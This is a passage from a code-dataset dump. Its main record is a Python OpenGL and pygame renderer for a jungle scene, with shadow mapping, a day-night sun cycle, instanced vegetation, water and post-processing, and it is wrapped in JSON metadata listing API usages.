"usage_type": "attribute"}, {"api_name": "numpy.arange", "line_number": 872, "usage_type": "call"}, {"api_name": "numpy.var", "line_number": 909, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 914, "usage_type": "call"}, {"api_name": "scipy.optimize.minimize", "line_number": 916, "usage_type": "call"}, {"api_name": "utils.fill_mask", "line_number": 917, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 926, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 1016, "usage_type": "call"}, {"api_name": "manifold_gp.ManifoldGaussianProcess", "line_number": 1024, "usage_type": "call"}, {"api_name": "manifold_gp.fit", "line_number": 1033, "usage_type": "call"}, {"api_name": "numpy.log10", "line_number": 1069, "usage_type": "call"}, {"api_name": "utils.frac_to_mag", "line_number": 1071, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 1091, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 1120, "usage_type": "call"}, {"api_name": "numpy.random.choice", "line_number": 1139, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 1139, "usage_type": "attribute"}, {"api_name": "numpy.where", "line_number": 1139, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 1139, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 1156, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 1157, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 1158, "usage_type": "call"}, {"api_name": "scipy.optimize.minimize", "line_number": 1168, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 1188, "usage_type": "call"}, {"api_name": "scipy.optimize.minimize", "line_number": 1196, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 1208, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 1219, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 1230, "usage_type": "call"}, {"api_name": "idrtools.math.nmad", "line_number": 1231, "usage_type": "call"}, {"api_name": "idrtools.math", "line_number": 1231, "usage_type": "name"}, {"api_name": "tqdm.autonotebook.tqdm", "line_number": 1279, "usage_type": "call"}, {"api_name": "astropy.table.Table", "line_number": 1285, "usage_type": "call"}, {"api_name": "astropy.table", "line_number": 1285, "usage_type": "name"}, {"api_name": "numpy.sum", "line_number": 1294, "usage_type": "call"}, {"api_name": "extinction.fitzpatrick99", "line_number": 1294, "usage_type": "call"}, {"api_name": "scipy.optimize.minimize", "line_number": 1297, "usage_type": "call"}, {"api_name": "scipy.optimize.minimize", "line_number": 1307, "usage_type": "call"}, {"api_name": "scipy.optimize.minimize", "line_number": 1313, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 1367, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1367, "usage_type": "name"}, {"api_name": "numpy.ndim", "line_number": 1415, "usage_type": "call"}, {"api_name": "matplotlib.colors.ListedColormap", "line_number": 1429, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.cm.ScalarMappable", "line_number": 1441, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.cm", "line_number": 1441, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 1441, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.Normalize", "line_number": 1441, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 1449, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 1450, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 1451, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 1452, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 1453, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 1454, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 1491, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1491, "usage_type": "name"}, {"api_name": "matplotlib.gridspec.GridSpec", "line_number": 1492, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 1584, "usage_type": "call"}, {"api_name": "numpy.atleast_2d", "line_number": 1609, "usage_type": "call"}, {"api_name": "numpy.atleast_2d", "line_number": 1611, "usage_type": "call"}, {"api_name": "numpy.isscalar", "line_number": 1616, "usage_type": "call"}, {"api_name": "numpy.isscalar", "line_number": 1629, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.gcf", "line_number": 1669, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1669, "usage_type": "name"}, {"api_name": "os.makedirs", "line_number": 1672, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 1674, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1674, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 1691, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 1693, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1693, "usage_type": "attribute"}, {"api_name": "manifold_gp.ManifoldGaussianProcess", "line_number": 1714, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 1725, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 1730, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 1753, "usage_type": "call"}, {"api_name": "numpy.floor", "line_number": 1755, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 1758, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 1783, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 1809, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 1810, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 1818, "usage_type": "call"}]}
+{"seq_id": "71581379608", "text": "# imports all openGL functions\nfrom OpenGL.GL import *\n\n#import glu\nfrom OpenGL.GLU import *\n\n# pygame is just used to create a window with the operating system on which to draw.\nimport pygame\n\n# we will use numpy to store data in arrays\nimport numpy as np\n\nimport time\n\nimport blender\nimport Shader\nfrom Material import Material, FaceTypes\nfrom Texture import Texture\nfrom Camera import Camera\nfrom Quaternion import Quaternion\nfrom Light import *\nfrom Mesh import Mesh\nfrom Skybox import Skybox\nfrom PostProcessing import PostProcessing\nfrom Water import Water\n\nfrom Programs import Programs\nfrom InstancedField import InstancedField\n\nfrom MathUtils import *\n\nimport random\n\nimport yaml\n\nfrom custom_logging import LOG, LogLevel\n\nfrom PIL import Image\n\nstart_time = time.time()\n\npygame.init()\n\ninitialized = False\n\nclass Scene:\n def __init__(self):\n self.width = 1920#1024\n self.height = 1080#768\n\n self.screen = pygame.display.set_mode((self.width, self.height), pygame.OPENGL | pygame.DOUBLEBUF, 32)\n\n self.clock = pygame.time.Clock()\n\n self.running = True\n\n self.meshes = []\n\n aspect = self.width / self.height\n\n self.camera = Camera(80, aspect, 0.1, 500)\n # handpicked location for the camera\n self.camera.transform.position = np.array([151.1606,-36.485424,-34.45971], \"f\")\n\n self.depthMapFBO = glGenFramebuffers(1)\n self.depthMap = glGenTextures(1)\n\n self.cameraDepthMapFBO = glGenFramebuffers(1)\n self.cameraDepthMap = glGenTextures(1)\n\n self.shadow_map_size = 4096\n\n self.sun = Light(np.array([1,1,1],\"f\"),1)\n #self.sun.transform.position = np.array([-150, 150, -150], \"f\")\n\n self.timeOfDay = 8\n\n self.calculateSun()\n\n self.skybox = Skybox()\n\n glEnable(GL_DEPTH_TEST)\n glEnable(GL_CULL_FACE)\n \n glCullFace(GL_BACK)\n\n glClearColor(0.1, 0.2, 0.3, 1.0)\n\n # enable transparency\n glEnable(GL_BLEND)\n glBlendFunc(GL_SRC_ALPHA, GL_ONE_MINUS_SRC_ALPHA)\n\n # initialize shadow map\n self.initialize_shadow_map()\n self.initialize_camera_depth_map()\n\n self.debugview = 0\n \n\n def initialize_shadow_map(self):\n \"\"\"\n Initializes the shadow map texture and framebuffer.\n \"\"\"\n glBindTexture(GL_TEXTURE_2D, self.depthMap)\n glTexImage2D(GL_TEXTURE_2D, 0, GL_DEPTH_COMPONENT, self.shadow_map_size, self.shadow_map_size, 0, GL_DEPTH_COMPONENT, GL_FLOAT, None)\n glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_MIN_FILTER, GL_NEAREST)\n glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_MAG_FILTER, GL_NEAREST)\n glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_WRAP_S, GL_CLAMP_TO_EDGE)\n glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_WRAP_T, GL_CLAMP_TO_EDGE)\n\n glBindFramebuffer(GL_FRAMEBUFFER, self.depthMapFBO)\n glFramebufferTexture2D(GL_FRAMEBUFFER, GL_DEPTH_ATTACHMENT, GL_TEXTURE_2D, self.depthMap, 0)\n glDrawBuffer(GL_NONE)\n glReadBuffer(GL_NONE)\n glBindFramebuffer(GL_FRAMEBUFFER, 0)\n\n def initialize_camera_depth_map(self):\n \"\"\"\n Initializes the camera depth map texture and framebuffer.\n \"\"\"\n glBindTexture(GL_TEXTURE_2D, self.cameraDepthMap)\n glTexImage2D(GL_TEXTURE_2D, 0, GL_DEPTH_COMPONENT, self.width, self.height, 0, GL_DEPTH_COMPONENT, GL_FLOAT, None)\n glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_MIN_FILTER, GL_NEAREST)\n glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_MAG_FILTER, GL_NEAREST)\n glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_WRAP_S, GL_CLAMP_TO_EDGE)\n glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_WRAP_T, GL_CLAMP_TO_EDGE)\n\n glBindFramebuffer(GL_FRAMEBUFFER, self.cameraDepthMapFBO)\n glFramebufferTexture2D(GL_FRAMEBUFFER, GL_DEPTH_ATTACHMENT, GL_TEXTURE_2D, self.cameraDepthMap, 0)\n glDrawBuffer(GL_NONE)\n glReadBuffer(GL_NONE)\n glBindFramebuffer(GL_FRAMEBUFFER, 0)\n\n\n def add_mesh(self, mesh: Mesh):\n \"\"\"\n Adds a mesh to the scene\n\n :param mesh: The mesh instance to add\n \"\"\"\n self.meshes.append(mesh)\n\n def draw_scene(self, shader: Shader):\n \"\"\"\n Draws the scene using the given shader.\n Shader needs to have a model, view and projection matrix uniform.\n\n This is used for the shadow map pass and the main draw pass, so shader is flexible.\n \n :param shader: Override shader to use for drawing\n \"\"\"\n if shader is not None:\n shader.use()\n\n for mesh in self.meshes:\n self.set_matrices(mesh, shader)\n if shader == None:\n mesh.shader.use()\n mesh.draw()\n\n def shadow_map(self):\n global initialized\n \"\"\"\n Renders the scene from the light's perspective to a depth map.\n \n This is used to determine which fragments are in shadow.\n \"\"\"\n #glCullFace(GL_FRONT)\n\n glBindTexture(GL_TEXTURE_2D, self.depthMap)\n glBindFramebuffer(GL_FRAMEBUFFER, self.depthMapFBO)\n\n lightProjection = self.sun.getLightProjection()\n lightView = self.sun.getLightView()\n\n lightSpaceMatrix = np.matmul(lightProjection, lightView)\n\n shadow_map_shader.use()\n glUniformMatrix4fv(shadow_map_shader.get_keyword(\"lightSpaceMatrix\"), 1, GL_TRUE, lightSpaceMatrix)\n\n glViewport(0, 0, self.shadow_map_size, self.shadow_map_size)\n glBindFramebuffer(GL_FRAMEBUFFER, self.depthMapFBO)\n glClear(GL_DEPTH_BUFFER_BIT)\n \n self.draw_scene(shadow_map_shader)\n tree_field.draw(shadow_map_trees_shader, current_time(), True, 0)\n\n # save depthMap to file\n if not initialized:\n data = glReadPixels(0, 0, self.shadow_map_size, self.shadow_map_size, GL_DEPTH_COMPONENT, GL_FLOAT)\n data = np.flip(data, 0)\n data = np.flip(data, 1)\n data = np.reshape(data, (self.shadow_map_size, self.shadow_map_size))\n data = data * 255\n data = data.astype(np.uint8)\n im = Image.fromarray(data)\n im.save(\"depthMap.png\")\n LOG(f\"Saved depthMap to file\", 3)\n initialized = True\n\n glBindFramebuffer(GL_FRAMEBUFFER, 0)\n\n #glCullFace(GL_BACK)\n\n def camera_depth(self):\n \"\"\"\n Renders the depth of the scene from the camera's perspective.\n This is used for post processing effects.\n \"\"\"\n glBindTexture(GL_TEXTURE_2D, self.cameraDepthMap)\n glBindFramebuffer(GL_FRAMEBUFFER, self.cameraDepthMapFBO)\n\n camera_depth_shader.use()\n glUniformMatrix4fv(camera_depth_shader.get_keyword(\"view\"), 1, GL_TRUE, self.camera.transform.getTRSMatrix())\n glUniformMatrix4fv(camera_depth_shader.get_keyword(\"projection\"), 1, GL_TRUE, self.camera.projectionMatrix)\n\n glViewport(0, 0, self.width, self.height)\n glBindFramebuffer(GL_FRAMEBUFFER, self.cameraDepthMapFBO)\n glClear(GL_DEPTH_BUFFER_BIT)\n\n self.draw_scene(camera_depth_shader)\n\n glBindFramebuffer(GL_FRAMEBUFFER, 0)\n\n\n # method that supplies model, view and projection matrices to the shader\n def set_matrices(self, mesh: Mesh, shader: Shader):\n \"\"\"\n Sets the model, view and projection matrices for the given shader.\n \n :param mesh: The mesh to get the model matrix from\n :param shader: The shader to set the matrices for\n \"\"\"\n shader.use()\n\n model_matrix = mesh.transform.getTRSMatrix()\n view_matrix = self.camera.getViewMatrix()\n projection_matrix = self.camera.projectionMatrix\n\n glUniformMatrix4fv(shader.get_keyword(\"model\"), 1, GL_TRUE, model_matrix)\n glUniformMatrix4fv(shader.get_keyword(\"view\"), 1, GL_TRUE, view_matrix)\n glUniformMatrix4fv(shader.get_keyword(\"projection\"), 1, GL_TRUE, projection_matrix)\n\n # light uniforms\n normalizedLightDir = -self.sun.transform.position / np.linalg.norm(self.sun.transform.position)\n glUniform3fv(shader.get_keyword(\"lightPos\"), 1, self.sun.transform.position)\n glUniform3fv(shader.get_keyword(\"lightDir\"), 1, normalizedLightDir)\n glUniform3fv(shader.get_keyword(\"sunColor\"), 1, self.sun.color)\n\n # light space matrix\n lightSpaceMatrix = self.sun.getLightSpaceMatrix()\n glUniformMatrix4fv(shader.get_keyword(\"lightSpaceMatrix\"), 1, GL_TRUE, lightSpaceMatrix)\n\n # shadow map (index 0)\n glActiveTexture(GL_TEXTURE0)\n glBindTexture(GL_TEXTURE_2D, self.depthMap)\n glUniform1i(shader.get_keyword(\"shadowMap\"), 0)\n\n glActiveTexture(GL_TEXTURE10)\n glBindTexture(GL_TEXTURE_CUBE_MAP, self.skybox.cubeMap)\n glUniform1i(shader.get_keyword(\"_Skybox\"), 10)\n\n glActiveTexture(GL_TEXTURE11)\n glBindTexture(GL_TEXTURE_2D, self.cameraDepthMap)\n glUniform1i(shader.get_keyword(\"cameraDepthMap\"), 11)\n\n # camera\n glUniform3fv(shader.get_keyword(\"camPos\"), 1, -self.camera.transform.position)\n glUniform3fv(shader.get_keyword(\"camFwd\"), 1, -self.camera.forward())\n\n mesh.material.use(shader)\n\n glUniform1f(shader.get_keyword(\"time\"), current_time())\n \n def set_face_culling(self, cull_face_type: int):\n \"\"\"\n Sets the face culling type.\n In most cases this should be GL_BACK, but if you want to draw the inside of a mesh, use GL_FRONT.\n \n :param cull_face_type: The face culling type\n \"\"\"\n if cull_face_type == FaceTypes.CULL_BACK:\n glEnable(GL_CULL_FACE)\n glCullFace(GL_BACK)\n elif cull_face_type == FaceTypes.CULL_FRONT:\n glEnable(GL_CULL_FACE)\n glCullFace(GL_FRONT)\n elif cull_face_type == FaceTypes.CULL_NONE:\n glDisable(GL_CULL_FACE)\n\n\n def update(self, dt: float):\n \"\"\"\n Updates the scene.\n\n :param dt: Delta time, the time since the last frame, used to make updates framerate independent\n \"\"\"\n #self.sun.transform.position = np.array([np.cos(current_time()) * 10, 2, np.sin(current_time()) * 10])\n\n self.debugView()\n\n for mesh in self.meshes:\n if mesh.isIcon:\n #mesh.transform.position = self.sun.transform.position\n #mesh.transform.lookAt(np.array([np.sin(current_time()),0,np.cos(current_time())]), np.array([0, 1, 0]))\n # rotate to look at camera\n mesh.transform.lookAtSelf(-self.camera.transform.position, np.array([0, 1, 0]))\n mesh.transform.rotateAxis(np.array([0, 1, 0]), 90)\n mesh.transform.rotateAxis(np.array([1,0,0]), -90)\n\n mesh.update(dt)\n\n self.get_mesh(\"sunIcon\").transform.position = self.sun.transform.position\n\n #self.meshes[0].transform.position = self.sun.transform.position\n\n def debugView(self):\n \"\"\"\n Allows user to click numbers from 0 to 9 to select drawing mode.\n \"\"\"\n # pygame get key pressed\n keys = pygame.key.get_pressed()\n\n key_map = {\n pygame.K_0: 0,\n pygame.K_1: 1,\n pygame.K_2: 2,\n pygame.K_3: 3,\n pygame.K_4: 4,\n pygame.K_5: 5,\n pygame.K_6: 6,\n pygame.K_7: 7,\n pygame.K_8: 8,\n pygame.K_9: 9\n }\n\n for key in key_map:\n if keys[key]:\n self.debugview = key_map[key]\n\n # plus on keypad\n if keys[pygame.K_KP_PLUS]:\n self.timeOfDay += 0.03\n self.timeOfDay %= 24\n\n self.calculateSun()\n \n # minus on keypad\n if keys[pygame.K_KP_MINUS]:\n self.timeOfDay -= 0.03\n self.timeOfDay %= 24\n\n self.calculateSun()\n\n def calculateSun(self):\n \"\"\"\n Calculates the sun's position based on the time of day. And the sun's color.\n \"\"\"\n\n # calculate sun position\n #self.sun.transform.position = np.array([np.cos(self.timeOfDay / 24 * 2 * np.pi) * 150, 100, np.sin(self.timeOfDay / 24 * 2 * np.pi) * 150])\n\n x = np.sin(self.timeOfDay / 24 * 2 * np.pi) * 150\n y = -np.cos(self.timeOfDay / 24 * 2 * np.pi) * 150\n z = np.cos(self.timeOfDay / 24 * 2 * np.pi) * 50\n\n # calculate sun color\n sunColor = np.array([1, 1, 1])\n\n full_bright = np.array([1, 1, 1])\n full_dark = np.array([0.1, 0.1, 0.1])\n orange = np.array([1, 0.5, 0.1])\n \n # 9 to 18, full brightness [1,1,1]\n # 18 to 22, orange [1,0.5,0]\n # 22 to 23, black\n # 23 to 24, black\n # 0 to 5, black\n # 5 to 9, orange\n \n if self.timeOfDay >= 9 and self.timeOfDay < 18:\n perc = MathUtils.InverseLerp(9, 18, self.timeOfDay)\n sunColor = full_bright\n elif self.timeOfDay >= 18 and self.timeOfDay < 22:\n perc = MathUtils.InverseLerp(18, 22, self.timeOfDay)\n sunColor = MathUtils.Lerp(full_bright, orange, perc)\n elif self.timeOfDay >= 22 and self.timeOfDay < 24:\n perc = MathUtils.InverseLerp(22, 24, self.timeOfDay)\n sunColor = MathUtils.Lerp(orange, full_dark, perc)\n elif self.timeOfDay >= 0 and self.timeOfDay < 5:\n sunColor = full_dark\n elif self.timeOfDay >= 5 and self.timeOfDay < 7:\n perc = MathUtils.InverseLerp(5, 7, self.timeOfDay)\n sunColor = MathUtils.Lerp(full_dark, orange, perc)\n elif self.timeOfDay >= 7 and self.timeOfDay < 9:\n perc = MathUtils.InverseLerp(7, 9, self.timeOfDay)\n sunColor = MathUtils.Lerp(orange, full_bright, perc)\n\n self.sun.transform.position = np.array([x,y,z])\n\n self.sun.color = sunColor\n\n\n def run(self):\n \"\"\"\n Main loop of the scene.\n\n Calculates delta time, updates the scene and draws it.\n \"\"\"\n\n while self.running:\n # handle events\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n LOG(\"Quitting...\", LogLevel.CRITICAL)\n self.running = False\n\n\n fps = self.clock.get_fps()\n dt = 1.0 if fps == 0 else 1.0 / fps\n\n ms = dt * 1000.0\n\n pygame.display.set_caption(f\"FPS: {fps:.2f} / {ms:.1f}ms\")\n\n self.cameraMovement(dt)\n self.update(dt)\n\n # MAIN DRAW LOOP\n self.shadow_map()\n self.camera_depth()\n\n # draw scene with post processing\n glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)\n self.postprocessing.before_draw(self.depthMap, self.sun, self.camera, self.cameraDepthMap)\n glViewport(0, 0, self.width, self.height)\n\n self.draw_scene(lit_shader)\n\n grass_field.draw(grass_shader, current_time(), False, self.debugview)\n tree_field.draw(grass_shader, current_time(), False, self.debugview)\n fern_field.draw(grass_shader, current_time(), False, self.debugview)\n water.draw(water_shader, self.camera, current_time(), self.sun)\n\n self.skybox.draw(skybox_shader, self.camera, self.sun)\n self.postprocessing.after_draw()\n\n # refreshing\n self.clock.tick(165)\n pygame.display.flip()\n \n def get_mesh(self, name: str) -> Mesh:\n \"\"\"\n Gets a mesh by its name.\n\n :param name: The name of the mesh\n :return: The mesh with the given name\n \"\"\"\n for mesh in self.meshes:\n if mesh.name == name:\n return mesh\n\n return None\n\n def cameraMovement(self, dt: float):\n # holding keys\n keys = pygame.key.get_pressed()\n \n # mouse delta\n mouse_delta = pygame.mouse.get_rel()\n\n # if mouse is held down\n if pygame.mouse.get_pressed()[0]:\n rotX = mouse_delta[0] * dt * 50\n rotY = mouse_delta[1] * dt * 50\n \n self.camera.rotate_local(rotY, rotX)\n\n speed = 7.0 * dt\n\n # if holding left shift speed up\n if keys[pygame.K_LSHIFT]:\n speed *= 35\n\n if keys[pygame.K_w]:\n self.camera.transform.position += self.camera.forward() * speed\n if keys[pygame.K_s]:\n self.camera.transform.position -= self.camera.forward() * speed\n if keys[pygame.K_a]:\n self.camera.transform.position += self.camera.right() * speed\n if keys[pygame.K_d]:\n self.camera.transform.position -= self.camera.right() * speed\n if keys[pygame.K_q]:\n self.camera.transform.position += self.camera.up() * speed\n if keys[pygame.K_e]:\n self.camera.transform.position -= self.camera.up() * speed\n\n def load_scene(self, path: str):\n \"\"\"\n Loads a scene from a file.\n \n :param path: The path to the scene file\n \"\"\"\n\n with open(path, \"r\") as scene:\n scene_data = yaml.safe_load(scene)\n\n materials = {}\n\n # fetch materials\n for material_name in scene_data[\"Materials\"]:\n material_data = scene_data[\"Materials\"][material_name]\n \n texture_data = material_data[\"textures\"]\n\n tiling = np.array(material_data[\"tiling\"])\n\n mat = Material()\n mat.name = material_name\n\n mat.tiling = tiling\n\n mat.shader = lit_shader\n\n mat.ambient = material_data[\"ambient\"]\n mat.diffuse = material_data[\"diffuse\"]\n mat.specular = material_data[\"specular\"]\n mat.specularExponent = material_data[\"specularExponent\"]\n mat.metallic = material_data[\"metallic\"]\n\n if \"tiling_speed\" in material_data:\n mat.tiling_speed = material_data[\"tiling_speed\"]\n\n for tex_name, tex_path in texture_data.items():\n tex = Texture.Load(tex_path)\n mat.add_texture(tex, tex_name)\n\n materials[material_name] = mat\n \n\n # fetch meshes\n for mesh_name in scene_data[\"Meshes\"]:\n mesh_data = scene_data[\"Meshes\"][mesh_name]\n \n mesh = blender.load_mesh(mesh_data[\"path\"])\n mesh.name = mesh_name\n \n mat_name = mesh_data[\"material\"]\n mesh.set_material(materials[mat_name])\n\n mesh.transform.position = mesh_data[\"position\"]\n\n rotX, rotY, rotZ = mesh_data[\"rotation\"]\n mesh.transform.rotation = Quaternion.FromEuler(rotX, rotY, rotZ)\n\n mesh.transform.scale = mesh_data[\"scale\"]\n\n recalculate_normals = mesh_data[\"recalculateNormals\"]\n if recalculate_normals:\n mesh.recalculate_normals()\n\n if \"isIcon\" in mesh_data:\n mesh.isIcon = mesh_data[\"isIcon\"]\n else:\n mesh.isIcon = False\n\n if \"scripts\" in mesh_data:\n for script in mesh_data[\"scripts\"]:\n mesh.add_script(script)\n\n if \"one_time_scripts\" in mesh_data:\n scripts = mesh_data[\"one_time_scripts\"]\n for script in scripts:\n LOG(f\"Running one time script {script} on {mesh_name}\", LogLevel.INFO)\n program = Programs[script]\n program(mesh)\n\n self.meshes.append(mesh)\n \n\ndef current_time():\n \"\"\"\n Returns the time since the program started in seconds.\n Used for animations inside shaders.\n\n :return: The time since the program started in seconds\n \"\"\"\n return time.time() - start_time\n\n\nscene = Scene()\n\n# initialize basic shaders\nshadow_map_shader = Shader.Shader(\"shaders/shadow_map/shadow_vertex.glsl\", \"shaders/shadow_map/shadow_fragment.glsl\")\nlit_shader = Shader.Shader(\"shaders/basic/vertex.glsl\", \"shaders/basic/fragment.glsl\")\nskybox_shader = Shader.Shader(\"shaders/skybox/vertex.glsl\", \"shaders/skybox/fragment.glsl\")\npostprocess_shader = Shader.Shader(\"shaders/postprocess/vertex.glsl\", \"shaders/postprocess/fragment.glsl\")\ncamera_depth_shader = Shader.Shader(\"shaders/camera/camera_depth_vertex.glsl\", \"shaders/camera/camera_depth_fragment.glsl\")\ngrass_shader = Shader.Shader(\"shaders/grass/vertex.glsl\", \"shaders/grass/fragment.glsl\")\nshadow_map_trees_shader = Shader.Shader(\"shaders/grass/vertex.glsl\", \"shaders/shadow_map/shadow_fragment.glsl\")\nwater_shader = Shader.Shader(\"shaders/water/vertex.glsl\", \"shaders/water/fragment.glsl\")\n\nscene.postprocessing = PostProcessing(postprocess_shader, scene.width, scene.height)\n\nscene.load_scene(\"scene.yaml\")\n\n# calculated manually inside perlin noise generator for a given seed.\nworldYBounds = np.array([-40.0, 22.067507434821415])\n\ngrass_field = InstancedField()\ngrass_field.setup(scene.camera, \n scene.sun,\n worldYBounds,\n blender.load_mesh(\"models/jungle/grass_high.obj\"),\n Texture.Load(\"textures/grass/color.jpg\"),\n Texture.Load(\"textures/grass/opacity.jpg\"),\n Texture.Load(\"textures/grass/normal.png\"),\n 500_000, 0.5)\n\ngrass_field.shadowMap = scene.depthMap\n\ntree_field = InstancedField()\ntree_field.setup(scene.camera,\n scene.sun,\n worldYBounds,\n blender.load_mesh(\"models/jungle/tree_low.obj\"),\n Texture.Load(\"textures/tree/tree_albedo.png\"),\n None,\n Texture.Load(\"textures/tree/tree_normal.png\"),\n 25, 0.5)\n\ntree_field.shadowMap = scene.depthMap\n\nfern_field = InstancedField()\nfern_field.setup(scene.camera,\n scene.sun,\n worldYBounds,\n blender.load_mesh(\"models/jungle/fern.obj\"),\n Texture.Load(\"textures/Fern/color.jpg\"),\n Texture.Load(\"textures/Fern/opacity.jpg\"),\n Texture.Load(\"textures/Fern/normal.png\"),\n 1_000, 0.5)\n\nfern_field.shadowMap = scene.depthMap\n\nwater = Water(np.array([0, -2, 0]), np.array([200,200,200]), scene.skybox)\n\nscene.run()", "repo_name": "killereks/3D-experiments", "sub_path": "Proper Rasterizer/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 22465, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "time.time", "line_number": 40, "usage_type": "call"}, {"api_name": "pygame.init", "line_number": 42, "usage_type": "call"}, {"api_name": "pygame.display.set_mode", "line_number": 51, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 51, "usage_type": "attribute"}, {"api_name": "pygame.OPENGL", "line_number": 51, "usage_type": "attribute"}, {"api_name": "pygame.DOUBLEBUF", "line_number": 51, "usage_type": "attribute"}, {"api_name": "pygame.time.Clock", "line_number": 53, "usage_type": "call"}, {"api_name": "pygame.time", "line_number": 53, "usage_type": "attribute"}, {"api_name": "Camera.Camera", "line_number": 61, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 63, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 73, "usage_type": "call"}, {"api_name": "Skybox.Skybox", "line_number": 80, "usage_type": "call"}, {"api_name": "Mesh.Mesh", "line_number": 135, "usage_type": "name"}, {"api_name": "numpy.matmul", "line_number": 176, "usage_type": "call"}, {"api_name": "numpy.flip", "line_number": 191, "usage_type": "call"}, {"api_name": "numpy.flip", "line_number": 192, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 193, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 195, "usage_type": "attribute"}, {"api_name": "PIL.Image.fromarray", "line_number": 196, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 196, "usage_type": "name"}, {"api_name": "custom_logging.LOG", "line_number": 198, "usage_type": "call"}, {"api_name": "Mesh.Mesh", "line_number": 227, "usage_type": "name"}, {"api_name": "numpy.linalg.norm", "line_number": 245, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 245, "usage_type": "attribute"}, {"api_name": "Material.FaceTypes.CULL_BACK", "line_number": 282, "usage_type": "attribute"}, {"api_name": "Material.FaceTypes", "line_number": 282, "usage_type": "name"}, {"api_name": "Material.FaceTypes.CULL_FRONT", "line_number": 285, "usage_type": "attribute"}, {"api_name": "Material.FaceTypes", "line_number": 285, "usage_type": "name"}, {"api_name": "Material.FaceTypes.CULL_NONE", "line_number": 288, "usage_type": "attribute"}, {"api_name": "Material.FaceTypes", "line_number": 288, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 307, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 308, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 309, "usage_type": "call"}, {"api_name": "pygame.key.get_pressed", "line_number": 322, "usage_type": "call"}, {"api_name": "pygame.key", "line_number": 322, "usage_type": "attribute"}, {"api_name": "pygame.K_0", "line_number": 325, "usage_type": "attribute"}, {"api_name": "pygame.K_1", "line_number": 326, "usage_type": "attribute"}, {"api_name": "pygame.K_2", "line_number": 327, "usage_type": "attribute"}, {"api_name": "pygame.K_3", "line_number": 328, "usage_type": "attribute"}, {"api_name": "pygame.K_4", "line_number": 329, "usage_type": "attribute"}, {"api_name": "pygame.K_5", "line_number": 330, "usage_type": "attribute"}, {"api_name": "pygame.K_6", "line_number": 331, "usage_type": "attribute"}, {"api_name": "pygame.K_7", "line_number": 332, "usage_type": "attribute"}, {"api_name": "pygame.K_8", "line_number": 333, "usage_type": "attribute"}, {"api_name": "pygame.K_9", "line_number": 334, "usage_type": "attribute"}, {"api_name": "pygame.K_KP_PLUS", "line_number": 342, "usage_type": "attribute"}, {"api_name": "pygame.K_KP_MINUS", "line_number": 349, "usage_type": "attribute"}, {"api_name": "numpy.sin", "line_number": 363, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 363, "usage_type": "attribute"}, {"api_name": "numpy.cos", "line_number": 364, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 364, "usage_type": "attribute"}, {"api_name": "numpy.cos", "line_number": 365, "usage_type": 